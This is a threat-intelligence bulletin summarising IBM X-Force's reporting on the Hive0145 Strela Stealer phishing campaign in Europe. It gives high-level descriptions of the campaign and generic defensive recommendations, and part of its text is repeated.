Strela Stealer: Today's Invoice Is Tomorrow's Phish
Summary:
In November 2024, IBM X-Force observed an ongoing Hive0145 campaign targeting Europe, specifically Spain, Germany, and Ukraine using Strela Stealer malware, a credential-theft tool delivered through highly tailored phishing emails. These emails, posing as legitimate invoice notifications, utilize previously compromised email credentials to blend seamlessly into legitimate email traffic. Strela Stealer specifically extracts credential data from Microsoft Outlook and Mozilla Thunderbird, significantly heightening the risk of BEC and lateral movement within victim networks. In mid-2024 Hive0145 shifted to an attachment hijacking technique, embedding a malicious payload in stolen emails from industries such as finance, tech, and manufacturing. Unlike standard thread hijacking, Hive0145’s approach preserves the original email body and only modifies the attachment, using the same filename but with a malicious payload. This tactic is automated, leveraging harvested emails and compromised credentials to distribute malware on a large scale.
Security Officer Comments:
The campaigns employ advanced obfuscation techniques, including polyglots, signed binaries, and uncommon file extensions to evade signature-based detection. The malware is delivered through Stellar Loader, a heavily obfuscated crypter that deploys Strela Stealer, executes process injection, and retrieves system and application data for exfiltration. Strela Stealer’s recent updates implement keyboard layout checks, now targeting Ukrainian speakers, and use error messages that blend with legitimate system alerts, minimizing user suspicion.
Suggested Corrections:
X-Force recommends organizations:
Link(s):
https://securityintelligence.com/x-force/strela-stealer-todays-invoice-tomorrows-phish/
In November 2024, IBM X-Force observed an ongoing Hive0145 campaign targeting Europe, specifically Spain, Germany, and Ukraine using Strela Stealer malware, a credential-theft tool delivered through highly tailored phishing emails. These emails, posing as legitimate invoice notifications, utilize previously compromised email credentials to blend seamlessly into legitimate email traffic. Strela Stealer specifically extracts credential data from Microsoft Outlook and Mozilla Thunderbird, significantly heightening the risk of BEC and lateral movement within victim networks. In mid-2024 Hive0145 shifted to an attachment hijacking technique, embedding a malicious payload in stolen emails from industries such as finance, tech, and manufacturing. Unlike standard thread hijacking, Hive0145’s approach preserves the original email body and only modifies the attachment, using the same filename but with a malicious payload. This tactic is automated, leveraging harvested emails and compromised credentials to distribute malware on a large scale.
Security Officer Comments:
The campaigns employ advanced obfuscation techniques, including polyglots, signed binaries, and uncommon file extensions to evade signature-based detection. The malware is delivered through Stellar Loader, a heavily obfuscated crypter that deploys Strela Stealer, executes process injection, and retrieves system and application data for exfiltration. Strela Stealer’s recent updates implement keyboard layout checks, now targeting Ukrainian speakers, and use error messages that blend with legitimate system alerts, minimizing user suspicion.
Suggested Corrections:
X-Force recommends organizations:
- Exercise caution with emails and ZIP archive attachments
- Consider changing the default application for Javascript/JScript/VBScript files to Notepad
- Monitor rundll32.exe processes executing remotely hosted DLLs
- Install and configure endpoint security software
- Update relevant network security monitoring rules
- Educate staff on the potential threats to the organization
Link(s):
https://securityintelligence.com/x-force/strela-stealer-todays-invoice-tomorrows-phish/